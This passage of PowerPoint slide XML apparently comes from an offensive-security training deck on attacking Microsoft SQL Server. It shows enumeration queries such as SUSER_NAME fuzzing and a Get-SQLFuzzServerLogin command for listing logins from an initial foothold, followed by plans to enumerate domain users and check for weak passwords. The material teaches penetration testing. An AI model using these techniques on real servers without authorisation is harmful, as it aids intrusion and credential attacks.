              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>Privilege</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>Stored</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>Procedure</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>Trigger</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>Creation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> / </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>Injection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>Issues</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>Automatic</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>Execution</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>of</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>Stored</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>Procedures</a:t>
            </a:r>
            <a:endParaRPr lang="cs-CZ" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="106277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50FE-FDBB-4D44-A30D-DEB572D5D7D3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>Weak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>Passwords</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> &amp; Blind SQL Server </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>Login</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>Enumeration</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D8FABA72-5D11-C747-B07D-FC62F8902B50}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>If</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>we</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>attempt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> to list </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>all</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> SQL Server </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>logins</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>through</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>our</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>initial</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>foothold</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>we</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>will</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>only</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>see</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>subset</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>of</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>them</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>metadata</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>security</a:t>
            </a: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dirty="0" err="1"/>
              <a:t>We</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>can</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>fuzz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>the</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>principal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> id </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>value</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>inside</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>the</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>suser_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>function</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>executing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>the</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>following</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>queries</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="cs-CZ" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="cs-CZ" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="TextBox 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1C858E88-86A5-FE43-94EE-192937244672}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="2372883"/>
            <a:ext cx="11041227" cy="6669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SELECT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1867" dirty="0" err="1">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1867" dirty="0">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t> FROM </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1867" dirty="0" err="1">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>sys.syslogins</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1867" dirty="0">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" defTabSz="1219170"/>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1867" dirty="0">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>SELECT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1867" dirty="0" err="1">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1867" dirty="0">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t> FROM </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1867" dirty="0" err="1">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>sys.server_principals</a:t>
            </a:r>
            <a:endParaRPr lang="cs-CZ" sz="1867" dirty="0">
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{68A6644D-EE94-A147-8B9B-A3E5507FA817}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="3777237"/>
            <a:ext cx="11041227" cy="9543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SELECT SUSER_NAME(1) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" defTabSz="1219170"/>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1867" dirty="0">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>SELECT SUSER_NAME(2) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" defTabSz="1219170"/>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1867" dirty="0">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>SELECT SUSER_NAME(3)</a:t>
            </a:r>
            <a:endParaRPr lang="cs-CZ" sz="1867" dirty="0">
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E33B3B68-90FC-D441-AAB7-77F1816783E4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="4944685"/>
            <a:ext cx="11041227" cy="379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&gt;&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1867" dirty="0" err="1">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>Get-SQLFuzzServerLogin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1867" dirty="0">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t> -Instance SQL </a:t>
            </a:r>
            <a:endParaRPr lang="cs-CZ" sz="1867"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424041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E8DC-1FEC-1A44-AEF9-C4451C85516B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>Weak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>Passwords</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> &amp; Blind SQL Server </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>Login</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>Enumeration</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EA9C19F2-BBA3-A349-A3CD-30E0CF1E9893}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>If</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>this</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>approach</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>fails</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>we</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>can</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>also</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>perform</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> blind </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>domain</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>account</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>objects</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>enumeration</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>through</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>our</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>initial</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>foothold</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>again</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>with</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>the</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> public role.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="cs-CZ" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>Then</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>we</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>can</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>target</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>the</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>identified</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>domain</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>users</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>continue</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>from</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>there</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>again</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>checking</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>for</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>weak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>passwords</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t>. In </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>addition</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>imagine</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>how</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>useful</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>this</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
